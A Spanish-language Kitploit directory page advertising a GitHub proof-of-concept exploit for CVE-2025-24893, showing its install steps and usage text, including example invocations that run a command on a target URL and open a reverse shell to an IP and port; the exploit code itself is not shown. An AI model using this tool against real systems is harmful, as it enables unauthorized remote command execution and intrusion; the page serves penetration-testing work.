Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893-POC | Kitploit
Herramientas/GitHubGitHub/th3gl0w/cve-2025-24893-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubth3gl0w/cve-2025-24893-poc

CVE-2025-24893-POC

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24893

Instalar bun:

root@kitploit:~
curl -fsSL https://bun.com/install | bash

Para instalar dependencias:

root@kitploit:~
bun install

Para ejecutar:

root@kitploit:~
bun run CVE-2025-24893.ts

Este proyecto fue creado usando bun init en bun v1.2.19. Bun es un runtime de JavaScript rápido y todo en uno.

Cómo usar:

root@kitploit:~
Usage: bun CVE-2025-24893.ts [options]

Options:
  -u, --url <url>           The target URL to interact with.
  -i, --ip <ip-address>     The IP address for a reverse shell connection.
  -p, --port <port-number>  The port number for the reverse shell.
  -r, --rverse              Open a reverse shell connection.
  -c, --cmd <command>       Execute a specific command.

Examples:
  # Execute a command on a target URL
  bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"

  # Open a reverse shell
  bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444

Aviso legal

Este exploit y guía son únicamente con fines educativos. Utiliza esta información de manera responsable y solo en sistemas para los que tengas permiso explícito de prueba. La explotación no autorizada de sistemas es ilegal y poco ética. Los autores y colaboradores no son responsables de ningún uso indebido o daño causado por esta información.

Descargar herramienta